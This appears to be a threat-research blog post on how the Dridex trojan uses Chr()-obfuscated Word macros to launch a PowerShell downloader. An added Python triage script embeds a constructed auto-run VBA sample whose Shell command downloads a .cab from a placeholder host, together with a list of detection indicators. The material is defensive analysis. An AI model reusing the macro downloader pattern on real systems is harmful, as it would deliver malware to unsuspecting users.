Threat Research

Dridex’s Macro Downloader

By Raul Alvarez | April 29, 2015

Modern malware uses every possible attack vector to infect a system. Email, which almost everyone has, is a common carrier. In this type of attack, attackers try to lure users into opening malicious attachments that look like documents but carry multiple file extensions, such as "financial.doc.exe". Most of the time the user sees only "financial.doc", without the ".exe" extension, which makes it easy to assume the file is a Microsoft Word document. Once the file is clicked and executed, the executable can download the rest of its malicious components.

But antivirus and security applications are now smarter than ever and are not fooled by multiple extensions. Even some users can now easily spot a maliciously crafted attachment filename. Therefore, to trick the user into clicking a document attachment, attackers have gone back to an old-school technique: macros that run only within a document. Macros are not visible to the user, and a malicious document cannot be spotted just by looking at its file extension.

Macros are embedded VBA (Visual Basic for Applications) code that executes whenever you open a malicious document. The common attacker technique is to show a normal-looking document while the macro runs in the background. It then downloads and executes other malware to infect your system. (Another article about the return of macros can be seen here.)

Macros and Dridex

Dridex is a banking trojan that uses a macro to trick the user into downloading it onto the user's machine. Figure 1 below shows the macro, detected as WM/Agent!tr, that Dridex uses to download its main malware component. The macro is a single procedure containing several string variables. A simple obfuscation technique is used: the Chr function is utilized to hide the actual strings.

Once the strings have been resolved, they form the downloader code, which consists of PowerShell instructions. The malware then uses the Shell function to execute the downloader code.

Figure 1. The macro used by Dridex.


Figure 2 shows the downloader code containing the URL of Dridex's executable file. If the PowerShell application is installed on the user's system, the malware downloads the executable using the DownloadFile method of the WebClient class. The payload is downloaded as a .cab file and expanded as 4543543.exe. Afterwards, it is executed and eventually infects the system.
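The two steps above, resolving the Chr-built strings and then looking at what is handed to Shell, are exactly what an analyst does by hand when triaging a document like this. The script below is an added example written for this article, not code from the article or from the Dridex macro itself: it statically resolves Chr() calls and string concatenation in a constructed VBA fragment (the URL is a placeholder on the .invalid domain), reassembles the expression passed to Shell, and flags the substrings an analyst would look for based on the behaviour described here (PowerShell, WebClient.DownloadFile, a .cab download). The function names and the indicator list are the example's own choices.

```python
import re

# Constructed sample in the style the article describes: string variables built
# from Chr() calls and concatenation, then handed to Shell. It is not the real
# Dridex macro; the URL is a placeholder (.invalid TLD), not an indicator.
SAMPLE_MACRO = '''
Sub AutoOpen()
    Dim a As String, b As String
    a = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)
    b = Chr(32) & "(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/placeholder.cab','x.cab')"
    Shell a & b, vbHide
End Sub
'''

# A VBA string literal: double-quoted, with an embedded quote written as "".
STR_LIT = r'"(?:[^"]|"")*"'
CHR_CALL = re.compile(r'Chr\$?\(\s*(\d+)\s*\)', re.IGNORECASE)
CONCAT = re.compile(r'(' + STR_LIT + r')\s*&\s*(' + STR_LIT + r')')
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(' + STR_LIT + r')\s*$', re.MULTILINE)
SHELL = re.compile(r'^\s*Shell\s+(.*)$', re.MULTILINE | re.IGNORECASE)
TOKEN = re.compile(STR_LIT + r'|\w+')

# Substrings worth flagging in a resolved command, taken from the behaviours the
# article describes (PowerShell, WebClient.DownloadFile, .cab download, expansion).
INDICATORS = ("powershell", "webclient", "downloadfile", ".cab", "expand", "http")


def chr_to_literal(match):
    """Turn Chr(NNN) into a VBA string literal, doubling an embedded quote."""
    ch = chr(int(match.group(1)))
    return '"' + (ch * 2 if ch == '"' else ch) + '"'


def resolve_strings(vba):
    """Replace Chr() calls with literals and fold "a" & "b" into "ab"."""
    text = CHR_CALL.sub(chr_to_literal, vba)
    while True:
        folded = CONCAT.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], text)
        if folded == text:
            return text
        text = folded


def unquote(literal):
    return literal[1:-1].replace('""', '"')


def extract_shell_commands(vba):
    """Return the string expression(s) passed to Shell, with variables inlined."""
    resolved = resolve_strings(vba)
    variables = {name: unquote(lit) for name, lit in ASSIGN.findall(resolved)}
    commands = []
    for expr in SHELL.findall(resolved):
        parts = []
        for tok in TOKEN.findall(expr):
            if tok.startswith('"'):
                parts.append(unquote(tok))
            elif tok in variables:
                parts.append(variables[tok])
            # Other identifiers (e.g. the vbHide window-style argument) carry no string data.
        commands.append(''.join(parts))
    return commands


def find_indicators(command):
    """List which of the expected downloader indicators appear in a command."""
    low = command.lower()
    return [ind for ind in INDICATORS if ind in low]


if __name__ == "__main__":
    for cmd in extract_shell_commands(SAMPLE_MACRO):
        print("Resolved Shell command:", cmd)
        print("Indicators:", find_indicators(cmd))
```

The resolver only handles the simple pattern the article shows (Chr() plus & concatenation plus single-level variables); macros that compute characters arithmetically or split strings across procedures need dynamic analysis or a fuller emulator, which is why the decoded Shell argument is worth checking rather than relying on the macro source alone.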

Figure 2. The PowerShell downloader code.


Macros are now more powerful than before with the help of other features, such as PowerShell. That is one of the reasons attackers are including them in their arsenal. Because of their simplicity, ease of use, and additional features, we are going to see more of them in the future.

We will continue to monitor new malware techniques and strategies and build appropriate protection against them to keep you safe.
